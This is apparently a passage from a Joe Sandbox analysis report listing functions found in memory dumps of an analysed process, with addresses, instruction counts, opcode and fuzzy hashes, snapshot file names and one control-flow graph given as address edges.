                                                            • Opcode Fuzzy Hash: 5d6874b7b66dafd7b4156b914fedd3ac3fdcedbda20285fe9bdde2d1dae0b489
                                                            • Instruction Fuzzy Hash: 64E1BE31A186078BEB19CF48C4E05B537B1FF45391B5546BDC85B8B68ADA38F882CB85
                                                            Function 00007FFD9C1D3B5C Relevance: .4, Instructions: 371COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 595 7ffd9c1d3b5c-7ffd9c1d3b68 596 7ffd9c1d3b6a-7ffd9c1d3b77 595->596 597 7ffd9c1d3d23-7ffd9c1d3d2b 596->597 598 7ffd9c1d3b7d-7ffd9c1d3b91 596->598 597->596 599 7ffd9c1d3d31-7ffd9c1d3d3c 597->599 602 7ffd9c1d3c61-7ffd9c1d3c74 call 7ffd9c1d3570 598->602 600 7ffd9c1d3cc2-7ffd9c1d3cd1 call 7ffd9c1d2080 599->600 601 7ffd9c1d3d3e-7ffd9c1d3d45 599->601 609 7ffd9c1d3cf7-7ffd9c1d3d06 call 7ffd9c1d21b0 600->609 610 7ffd9c1d3cd3-7ffd9c1d3cdb 600->610 603 7ffd9c1d3d4c-7ffd9c1d3d57 601->603 604 7ffd9c1d3d47 601->604 602->610 611 7ffd9c1d3c76-7ffd9c1d3c81 602->611 604->603 620 7ffd9c1d3d09-7ffd9c1d3d11 609->620 610->602 612 7ffd9c1d3cdd-7ffd9c1d3ce4 610->612 614 7ffd9c1d3d7a-7ffd9c1d3d95 611->614 615 7ffd9c1d3c87-7ffd9c1d3c9c 611->615 617 7ffd9c1d3ceb-7ffd9c1d3cf6 612->617 618 7ffd9c1d3ce6 612->618 623 7ffd9c1d3d97 614->623 624 7ffd9c1d3d9d 614->624 615->614 616 7ffd9c1d3ca2-7ffd9c1d3cb5 615->616 616->620 621 7ffd9c1d3cb7-7ffd9c1d3cbf 616->621 618->617 627 7ffd9c1d3d19-7ffd9c1d3d1c 620->627 621->600 623->624 625 7ffd9c1d3da1-7ffd9c1d3db8 624->625 626 7ffd9c1d3d9f 624->626 628 7ffd9c1d3dba-7ffd9c1d3e03 625->628 629 7ffd9c1d3e01 625->629 626->625 627->597 632 7ffd9c1d3dcb-7ffd9c1d3e07 628->632 633 7ffd9c1d3e0e-7ffd9c1d3e2c 628->633 629->628 641 7ffd9c1d3de5-7ffd9c1d3e00 632->641 642 7ffd9c1d3e2e-7ffd9c1d3e60 632->642 645 7ffd9c1d3e65-7ffd9c1d3f4d 642->645 646 7ffd9c1d3f48 642->646 649 7ffd9c1d3e7c-7ffd9c1d3f57 645->649 650 7ffd9c1d3f61-7ffd9c1d3f7f 645->650 646->645 658 7ffd9c1d3ea6-7ffd9c1d3ea9 649->658 659 7ffd9c1d3f2d-7ffd9c1d3f45 649->659 658->659 660 7ffd9c1d3eaf-7ffd9c1d3eb2 658->660 659->646 662 7ffd9c1d3f1b-7ffd9c1d3f22 660->662 663 7ffd9c1d3eb4-7ffd9c1d3ee1 660->663 664 7ffd9c1d3ee2-7ffd9c1d3efc 662->664 665 7ffd9c1d3f24-7ffd9c1d3f2c 662->665 666 7ffd9c1d3f81-7ffd9c1d3fd1 call 7ffd9c1d07c0 664->666 667 7ffd9c1d3f02-7ffd9c1d3f0d 664->667 667->666 669 7ffd9c1d3f0f-7ffd9c1d3f19 667->669 669->662
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 27c8c67b6134a74240d0226017b27c3832f64140808fcc08355f895e289ff6e1
                                                            • Instruction ID: 5786057acfb643caa5566edffc7a5c834a30370f705da4a08d92c680408668ac
                                                            • Opcode Fuzzy Hash: 27c8c67b6134a74240d0226017b27c3832f64140808fcc08355f895e289ff6e1
                                                            • Instruction Fuzzy Hash: B8C12732E0DB478FD369DB64D4A04B477F0EF49350B9406BEC44AC75D2EA29B842CB86
                                                            Function 00007FFD9C1DFB5C Relevance: .4, Instructions: 363COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f862513bf3c8f70200660eae3b5da79b9f3bc7cb46df0bb445ffe7a2346f04ac
                                                            • Instruction ID: c9ed74688bc25116dd0a3500b0067f3b4c89642ef7f319d6e520a364c4add9ef
                                                            • Opcode Fuzzy Hash: f862513bf3c8f70200660eae3b5da79b9f3bc7cb46df0bb445ffe7a2346f04ac
                                                            • Instruction Fuzzy Hash: ADC12532E0DB478FD369DB64D4A04B577F0EF45390B1446BEC48AC7283EA29B9428786
                                                            Function 00007FFD9C1D2412 Relevance: .3, Instructions: 330COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 99e45bff8daa31b65ddd49c7c9629a442fed39f1fe0c3d11fd83aeac4d24c7df
                                                            • Instruction ID: 786959092b9d30fa50722a8e1165042c0259eff63677199382bbdcfa1d5de0f9
                                                            • Opcode Fuzzy Hash: 99e45bff8daa31b65ddd49c7c9629a442fed39f1fe0c3d11fd83aeac4d24c7df
                                                            • Instruction Fuzzy Hash: 2BC1D331A0CA478FE759DB68C0A06A4B7B1FF59340F544279D45EC7A87EB28BC51CB84
                                                            Function 00007FFD9C1DE412 Relevance: .3, Instructions: 328COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b174b00cafacd05edf488098c419e9716fdd8827f5ee4ef32bef410611037b5a
                                                            • Instruction ID: 84fcde70841065eb0cdf8f322ee0d07a38a84023921181bb88aae75b6bdddd72
                                                            • Opcode Fuzzy Hash: b174b00cafacd05edf488098c419e9716fdd8827f5ee4ef32bef410611037b5a
                                                            • Instruction Fuzzy Hash: 4CC1D431B08A478FE759DB68C0A06A4B7B1FF59381F554279D04EC7A86EB38B851CB84
                                                            Function 00007FFD9C1DBBF2 Relevance: .3, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f7ce2ca87e592634eca4b29e3df1a96f129fe1835f46641738ce51fe4409a687
                                                            • Instruction ID: a8e7c7c6b20dcd41e5281910eba340ec05e37559f4d0ee3095f192727aea2731
                                                            • Opcode Fuzzy Hash: f7ce2ca87e592634eca4b29e3df1a96f129fe1835f46641738ce51fe4409a687
                                                            • Instruction Fuzzy Hash: 9D31B572F0D95BCEE7B99A9844716F8B6B0FF54384F14027AE14FEB1C2ED2868808745
                                                            Function 00007FFD9C1D1BB5 Relevance: .3, Instructions: 296COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2cf043c851a5d41e42925c6d626d6290b4114603ac70f1eb551cf026ebc710ff
                                                            • Instruction ID: d3a24a15ce2ba87e8dd22d5f1073f14fa770d0f38d43000e248a6c66ee40b701
                                                            • Opcode Fuzzy Hash: 2cf043c851a5d41e42925c6d626d6290b4114603ac70f1eb551cf026ebc710ff
                                                            • Instruction Fuzzy Hash: 68812B72F0C7474FE72D9E68946517577F1EF85360F20067EE48FD3292EA24A802878A
                                                            Function 00007FFD9C1D1946 Relevance: .3, Instructions: 276COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 38b45ac510f6953123b7764134b98a8241dec3481eeb35949e2c38f3351c26a7
                                                            • Instruction ID: e7c2a5fc662af2f41d86e92d6b6426f7b480d0e7d5dc2315a9f67d5981279314
                                                            • Opcode Fuzzy Hash: 38b45ac510f6953123b7764134b98a8241dec3481eeb35949e2c38f3351c26a7
                                                            • Instruction Fuzzy Hash: 5C911B33F0C7874FE77C9AA8946117577F1EF513A0B2406BED48ED7292E928B8028746
                                                            Function 00007FFD9C419A95 Relevance: .3, Instructions: 271COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4240702182.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c410000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e6014ec9b13bf80ae7c5bf983ad2c42769519b3311c61e7a9274fe792ca3b078
                                                            • Instruction ID: 2e612dc8c3da88048965d70bfa01c644b5d0a06d4b4094dff7e8adb38ec8cb5c
                                                            • Opcode Fuzzy Hash: e6014ec9b13bf80ae7c5bf983ad2c42769519b3311c61e7a9274fe792ca3b078
                                                            • Instruction Fuzzy Hash: 8BB1DA70A18A6D8FEBA4EB58C8A5BE9B7B1FF68344F4045E9D04DD3291CE346981CF41
                                                            Function 00007FFD9C1DC1FA Relevance: .3, Instructions: 270COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8410f21d66223f1fafc2696b2c5901d52f7ce133289976c84eed9ccb989c4e9a
                                                            • Instruction ID: 3a37a435058c9400ba32cca5d1c21b11ba1f6336d2c33a9bcbcb266c8d91b0a7
                                                            • Opcode Fuzzy Hash: 8410f21d66223f1fafc2696b2c5901d52f7ce133289976c84eed9ccb989c4e9a
                                                            • Instruction Fuzzy Hash: D5A1F573E1C69B5FEB65DBB8C8B14E97BB0FF11358F0806BAD089AA1D3ED1864018745
                                                            Function 00007FFD9C1DB877 Relevance: .3, Instructions: 252COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 80973e212473ab51c320cd031bd5f15d6f8b38088dcb2a59edbd0c280b76f999
                                                            • Instruction ID: 95420723122c10a97e2765bfb98b71ab32c64a3d2e4fe409e059b8400f95caa1
                                                            • Opcode Fuzzy Hash: 80973e212473ab51c320cd031bd5f15d6f8b38088dcb2a59edbd0c280b76f999
                                                            • Instruction Fuzzy Hash: 537126B2E0C98B4FE77CDA5888665B437E0EF45350B0403B9D45FDB5E2ED18A8868785
                                                            Function 00007FFD9C1D064B Relevance: .2, Instructions: 223COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9553b62f51780d80a2291f7a90b9e85c2ae44c72e63c27356e131b21d58390a6
                                                            • Instruction ID: 6537e6c185be96de8927fe39dd623b559e58bc190d8b424207e9201cd439744e
                                                            • Opcode Fuzzy Hash: 9553b62f51780d80a2291f7a90b9e85c2ae44c72e63c27356e131b21d58390a6
                                                            • Instruction Fuzzy Hash: 5071CA32E1C54B8FEB65DBB488646BD7BB0EF55340F5006BAD00EE71E2EE286841C745
                                                            Function 00007FFD9C1DD956 Relevance: .2, Instructions: 222COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8b6e9af5e62d4b0270f9f389ae600d3f51381f372d2b479f830b54e34e70592c
                                                            • Instruction ID: d4311d1cb433dfc63ec739d5e5be27443e97fedc93323a158774250449f35fa9
                                                            • Opcode Fuzzy Hash: 8b6e9af5e62d4b0270f9f389ae600d3f51381f372d2b479f830b54e34e70592c
                                                            • Instruction Fuzzy Hash: 0A611932F0CA478BF338BA68946567577F0EF46354B1446BED48ED3282EE29B4018769
                                                            Function 00007FFD9C1D3BA1 Relevance: .2, Instructions: 203COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 25893f221b5b6e3a287d0fa2e393d67c8813c45f587e699fb15e12c0a1385ecb
                                                            • Instruction ID: c750a1de0c6ce1a8bc158e66860787baa8826da598e8c21b01a19b59ca500b11
                                                            • Opcode Fuzzy Hash: 25893f221b5b6e3a287d0fa2e393d67c8813c45f587e699fb15e12c0a1385ecb
                                                            • Instruction Fuzzy Hash: 9A71EF31E0DB078FE369DF54D0A457177F1FF08340B9406BAC08AD7692EA29B842CB89
                                                            Function 00007FFD9C1DFBA1 Relevance: .2, Instructions: 203COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3c817f009b6a1c0e3dd3100d4fdde4ed8250713803b85c3f3da0a8261ecb507c
                                                            • Instruction ID: 4ff081644a811d50e60a168c415d3e04cfffb8cdc3df12298922362c88ee2c03
                                                            • Opcode Fuzzy Hash: 3c817f009b6a1c0e3dd3100d4fdde4ed8250713803b85c3f3da0a8261ecb507c
                                                            • Instruction Fuzzy Hash: C671BE31E0CB478FE369DF54D1A067177F0FF05384B14467AC48AD7692EA29B942CB89
                                                            Function 00007FFD9C1E1010 Relevance: .2, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b86f3ad033f7094db7cfaa5e462645e392dfadcdedba2ef9ff30b95903181474
                                                            • Instruction ID: a33cbd2ea7d20ee71b46c4b3dbf30b4d105da38b18a6630906a0f9acf7a22a48
                                                            • Opcode Fuzzy Hash: b86f3ad033f7094db7cfaa5e462645e392dfadcdedba2ef9ff30b95903181474
                                                            • Instruction Fuzzy Hash: A751A771B0C54A8FEBA8DF58C855AB937F0FF59350F20017BE40ED72A2DA25A841C785
                                                            Function 00007FFD9C1D2EF0 Relevance: .2, Instructions: 178COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b5ed84dc09152dfbde0fa82d6765434148e61664a0e8d4b3af3c80e4bc658a3d
                                                            • Instruction ID: 700fb8b63d9d721daf26233bacace4071cbc98a41ec9c19306a3f186ebb3fc7f
                                                            • Opcode Fuzzy Hash: b5ed84dc09152dfbde0fa82d6765434148e61664a0e8d4b3af3c80e4bc658a3d
                                                            • Instruction Fuzzy Hash: 5551D232F2C95B4AEB7C9A5888716B877B1EF59300F4046F9D05ED72C7DE3868858B42
                                                            Function 00007FFD9BAD08E8 Relevance: .2, Instructions: 152COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4221642207.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bad0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1468bb9e180ec6301a2b278fea10b0c46e225840dc161f2bcb3a41a388f2124b
                                                            • Instruction ID: 72c16c271f4a9d4073d145311c20190c8358e52da2775ce36ff25142d220a368
                                                            • Opcode Fuzzy Hash: 1468bb9e180ec6301a2b278fea10b0c46e225840dc161f2bcb3a41a388f2124b
                                                            • Instruction Fuzzy Hash: BC51A331A0850D9FCF54EF58D894EED7BF1FF58325B054266E419E72A1CA74E990CB80
                                                            Function 00007FFD9C1DEEF0 Relevance: .1, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 299297efb38570db72a445504df90f8069c8bf3aa779ef8c89e0bb9cbe9cc9cb
                                                            • Instruction ID: d9b9f449a7ccd3a038a40442124efbd4e9e92bed1ab324d2c58da7e3fbf9324d
                                                            • Opcode Fuzzy Hash: 299297efb38570db72a445504df90f8069c8bf3aa779ef8c89e0bb9cbe9cc9cb
                                                            • Instruction Fuzzy Hash: 24512631E1C95F8EEB78D6588460BB973B1FF98341F1082F9C04ED7186EE38A9818B45
                                                            Function 00007FFD9C1DD35B Relevance: .1, Instructions: 142COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a9e2bf6a31f73b9830b001b6531bbf3f58cde4954581355778caf63ae8b45c3d
                                                            • Instruction ID: b87be128bf60e33f9ebea12ba87278d95688697a99cff3cc9b64bda79695bd31
                                                            • Opcode Fuzzy Hash: a9e2bf6a31f73b9830b001b6531bbf3f58cde4954581355778caf63ae8b45c3d
                                                            • Instruction Fuzzy Hash: 38416672F1991B5FEB68EB58C4A16A8B3B1FF55350B104279D01ED3686EF24BC01C794
                                                            Function 00007FFD9C1D15FF Relevance: .1, Instructions: 139COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9315f5cbc0638d5c1f860c6a97a91d5224b6dc526e5568ad4ec9d86ef477013f
                                                            • Instruction ID: c7a5ed77f68041c0be7bb387255a09829e9af1eebd580c0bdb4e70e9ba48d8c2
                                                            • Opcode Fuzzy Hash: 9315f5cbc0638d5c1f860c6a97a91d5224b6dc526e5568ad4ec9d86ef477013f
                                                            • Instruction Fuzzy Hash: 5E41D762E0E7C64FE76A46B458741A47FB1AF422B0B1D42FBE08DCA093E9985847C355
                                                            Function 00007FFD9C1DB4FC Relevance: .1, Instructions: 131COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 83bf3b8f52103c8181c5be7663cb62dd5a22f903a3a26fb758270d2fbd97c927
                                                            • Instruction ID: e7d4606b833280216faa2bd7503ce42cdd8e3659a00dd8f520c203afabba235a
                                                            • Opcode Fuzzy Hash: 83bf3b8f52103c8181c5be7663cb62dd5a22f903a3a26fb758270d2fbd97c927
                                                            • Instruction Fuzzy Hash: 87413832D4E3CA8FE317936498155E53FB0EF83364F0402EAE08ACE0E3E6551046C746
                                                            Function 00007FFD9BAD090D Relevance: .1, Instructions: 128COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4221642207.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bad0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a14bbd4e0025a3f19c18a4532fcbb938c934da4fce0b6b6f82d2a46b3a65ce52
                                                            • Instruction ID: 817c6ebd01fb8e25ad9b4fcbbce65ca66a53374e7305eb4666c0f8f303fe608d
                                                            • Opcode Fuzzy Hash: a14bbd4e0025a3f19c18a4532fcbb938c934da4fce0b6b6f82d2a46b3a65ce52
                                                            • Instruction Fuzzy Hash: D941E631E0865D4ED764FBA8E8A5AFC77A0FF58329F00067BE40DD61A7CE286481C784
                                                            Function 00007FFD9C1E0157 Relevance: .1, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 887f9a14e416c26bcb89d4bf7e7bbb3c8fe5aadc2a28a76a8f81db815b30bfb0
                                                            • Instruction ID: 0d053a3b7c9b21d21f654b7cff497b2d685eaef9b0fdeffe71c3d78ef4c21a07
                                                            • Opcode Fuzzy Hash: 887f9a14e416c26bcb89d4bf7e7bbb3c8fe5aadc2a28a76a8f81db815b30bfb0
                                                            • Instruction Fuzzy Hash: D741843270C9498FEF98EF58C465DA473E1FFA832470402AAE04AD7692CE35E855CB85
                                                            Function 00007FFD9C1D41C7 Relevance: .1, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4c2e50248fccd3f5bb5494b4b551d857993f03eef37e8e35ff51aa95921a4167
                                                            • Instruction ID: c1b652fe1c1c0352a2292f218fc7185cfa45e79bd68f464ed4f6eff4464cfcec
                                                            • Opcode Fuzzy Hash: 4c2e50248fccd3f5bb5494b4b551d857993f03eef37e8e35ff51aa95921a4167
                                                            • Instruction Fuzzy Hash: A941763260C9058FDFECEF58C465EA477E1FFA8324B04026AE04ED7692DE25E845CB45
                                                            Function 00007FFD9C1E0201 Relevance: .1, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e65f7c3c1d571a86551e7da2c55ce060217275662cf77c9bdb8e86867dee4fbf
                                                            • Instruction ID: 87549b439e7e634c441c965c8c70dcef64327262897da6aa392166eb42da73a0
                                                            • Opcode Fuzzy Hash: e65f7c3c1d571a86551e7da2c55ce060217275662cf77c9bdb8e86867dee4fbf
                                                            • Instruction Fuzzy Hash: 8D31723260C9498FEF9DEB18C469DA473E1FFB831470402AAE45AC7693CE25E855CB85
                                                            Function 00007FFD9C1D4271 Relevance: .1, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 44f9fdf290bd90f1f6554a69ce19568e2afa49950e1b0ae6fe698bfd13685279
                                                            • Instruction ID: fb424171ea69a04ddaf8459044b60393cc954f727f2735346b07e8448bb8dfa8
                                                            • Opcode Fuzzy Hash: 44f9fdf290bd90f1f6554a69ce19568e2afa49950e1b0ae6fe698bfd13685279
                                                            • Instruction Fuzzy Hash: 9131607260C9458FDBACEF18C4A5EA477E1FFA8314B0402A9E05AC7693DE24E845CB85
                                                            Function 00007FFD9C1DDDF0 Relevance: .1, Instructions: 118COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
